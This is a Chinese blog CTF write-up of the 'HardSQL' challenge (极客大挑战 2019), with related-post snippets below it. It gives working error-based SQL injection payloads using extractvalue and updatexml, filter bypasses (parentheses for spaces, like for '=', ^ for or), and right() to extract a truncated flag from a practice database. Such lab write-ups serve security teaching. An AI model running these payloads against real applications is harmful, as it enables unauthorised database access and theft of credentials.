[极客大挑战 2019]HardSQL

最新推荐文章于 2024-10-28 17:07:57 发布
最新推荐文章于 2024-10-28 17:07:57 发布
阅读量117 收藏
点赞数 2
分类专栏: CTF sql 文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52387684/article/details/121188125
版权
CTF 同时被 2 个专栏收录
10 篇文章 0 订阅
订阅专栏
sql
7 篇文章 0 订阅
订阅专栏

[极客大挑战 2019]HardSQL

题型分析:

这是一个报错注入类型的SQL注入

过滤分析:

经过检查,发现他过滤了空格,union,and,sleep等。但是,发现他存在正常的报错。于是尝试进行报错注入

报错注入

报错注入的常见函数:

extractvalue(1,concat(0x7e,version(),0x7e))

在这里插入图片描述

aa'^extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like(database())),0x7e))%23

在这里插入图片描述

aa'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e))%23

在这里插入图片描述

aa'^extractvalue(1,concat(0x7e,(select(password)from(H4rDsq1)),0x7e))%23

在这里插入图片描述

我们发现Flag缺少于是,采用字符串截取的方式。substr,mid被过滤,尝试right发现可行。

RIGHT(s,n) 函数返回字符串 s 最右边的 n 个字符。

实例:

 select right('mysql',3);
+------------------+
| right('mysql',3) |
+------------------+
| sql              |
+------------------+
1 row in set (0.00 sec)

aa'^extractvalue(1,right(concat(0x7e,(select(password)from(H4rDsq1)),0x7e),30))%23

flag{2af77286-2de5-46c6-acb4-4a

在这里插入图片描述

aa'^extractvalue(1,right(concat(0x7e,(select(password)from(H4rDsq1)),0x7e),35))%23

c6-acb4-4aedc507c474}

在这里插入图片描述

最终flag

flag{2af77286-2de5-46c6-acb4-4aedc507c474}
南舍QAQ
关注
专栏目录
极客挑战2019Hardsql
uuzfumo的博客
11-06 412
SQL注入报错注入类型的相关题目,涉及一部分的绕过知识
极客挑战2019-hardsql
lht2004的博客
07-30 636
报表名 1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#报数据 1'or(updatexml(1,concat(0x7e,(select(group_concat(username,'~',password))from(H4rDsq1)),0x7e),1))#
BUUCTF [极客挑战 2019] HardSQL 1
m0_74167420的博客
06-18 327
原因:在输入' 或者 # 号时,'会被识别出来过滤掉,#会注释掉后面的内容,因此要进行url编码。在该题目中,双写被过滤掉了,同时空格,=,union也被过滤了。或者, payload为: 用 ^ 符号代替 or。1、阅读题目,是SQL注入的题目类型。2、尝试万能密码和堆叠注入,均被过滤。
web:[极客挑战 2019]HardSQL
sleepywin的博客
10-19 543
这里按照常规思路继续使用order by函数和union select函数进行查询,但是页面没有任何显示。这里也是显示不全,按照上面的updatexml后的方法进行补全即可。这里空格和=没有,使用()代替空格,使用like代替=题目名为hardsql,先来尝试有无sql注入存在。查看源代码没有发现其他的提示信息,随便尝试一下。发现flag显示不全,函数显示有字符数限制。先查询数据库,构造payload。查询表,构造payload。查字段,构造payload。可得知数据库名为geek。
极客挑战2019 HardSQL
Tajang的大千世界
04-10 182
打开靶机 先试一下万能密码1' or 1=1# 看起来过滤了一些东西,手动测试一下,发现过滤了and、=、空格、union等多个注入关键词(别问我为什么不fuzz,因为我fuzz结果跟手动测试结果有出入,明明过滤的,fuzz没测试出来) 试一下报错注入,然后将语句中被过滤的关键词改写就行。空格用()代替,=用like代替 查版本和数据库 原语句: admin' or updatexml(1,concat((select concat('~',version(),'~',database()))),1)#
[极客挑战 2019]HardSQL1
kw741951的博客
08-01 525
flag出来了,但是只有一半,使用right和left。拿到题目,好多类似的,这次估计更难,sql注入漏洞。
[极客挑战 2019]HardSQL 1
qq_44724114的博客
05-04 539
右键选择send to intruder——选择爆破点(这里我只选了password为爆破点)选择已经准备好的字典,下面的字典不全,但也勉强能用。我这里Length 如果是784的就不能跑 799的可以;具体的可以看Response的提示来判断。
[极客挑战 2019]HardSQL1 解题思路
xiyuanyue的博客
10-13 298
flag{d23142e7-2546-47c3-b238-de只返回一部分flag是因为updatexml 函数返回错误信息长度是112个字符,所以要对password 截取一部分,可以通过,substr left right函数做处理 ,substr函数已经禁止,就用right函数。2、尝试联合注入、时间盲注 发现 and union /**/ /*!2、关键字替换(空格替换,单引号替换,等号替换);3、通过错误函数updatexml 获取数据库、表、字段。3、错误函数、时间盲注、条件盲注。
[极客挑战 2019]HardSQL -wp
freerats的博客
07-04 693
直接找注入,随便填写用户名密码,用户名处多加个引号,有报错 加个or 1 # 有过滤,抓个包fuzz一下 等号,空格等被过滤 发现可以用报错注入,空格可以用括号代替 username=admin'or(extractvalue(1,concat('0x7e',version())))%23 username=admin'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table
[极客挑战 2019] web题-HardSQL
BROTHERYY的博客
07-13 385
复现环境:buuoj.cn union被过滤了 ,会被他抓住,使用updatexml 得到表名 得到字段查询username和password 查询密码发现不能显示完全 使用left和right进行查询 left=flag{2b77bf01-867e-4b28-a801-0 right=4-be1d-4be4-bc1b-24069dfe9222} 拼凑得到flag flag{2b77bf01-867e-4b28-a801-04-be1d-4be4-bc1b-24069dfe9222} ...
数据库-Navicat连接PostgreSQL的时候,显示连接成功但是点击报错
weixin_46969393的博客
10-28 218
Navicat连接PostgreSQL的时候,显示连接成功但是点击报错
深入理解 SQL 中的 WITH AS 语法
发现问题,面对问题,分析问题,解决问题,总结问题
10-24 818
WITH AS 语法又称为公共表表达式(CTE,Common Table Expression),允许开发者在一个查询中定义一个或多个临时结果集,这些结果集可以在随后的主查询中被引用。通过这种方式,开发者可以将复杂的查询逻辑分解为更易于理解和维护的多个部分。基本语法SELECT *
SQL Server 可观测最佳实践
最新发布
观测云的博客
10-28 822
本实践介绍如何通过观测云监控自建的 SQL Server,帮助我们及时识别数据库性能瓶颈和潜在问题,确保数据库高效运行和稳定性。
[OPEN SQL] FOR ALL ENTRIES IN
Hudas的博客
10-28 378
本文主要讲解SAP OPEN SQL中的FOR ALL ENTRIES IN 语句相关知识点
SQL】 Navicate 17 连接sql server
程序猿的学习路途博客
10-28 289
Navicate 17 连接sql server
Mybatis-09.基础操作-删除(预编译SQL)
程小白的博客
10-27 532
or '1' = '1'会永远成立,导致前面的条件判断失效,进而导致非用户也可以登录。时,仍然可以登录,这是为什么呢?
PostgreSQL 约束
lly202406的博客
10-27 482
PostgreSQL 是一种功能强大的开源对象关系数据库系统,它提供了多种约束来确保数据的完整性和一致性。约束是数据库规则,用于限制表中数据的类型和操作。在 PostgreSQL 中,约束可以分为几种类型,包括主键约束、外键约束、唯一约束、检查约束和非空约束。
极客挑战 2019]EasySQL
09-03
EasySQL极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值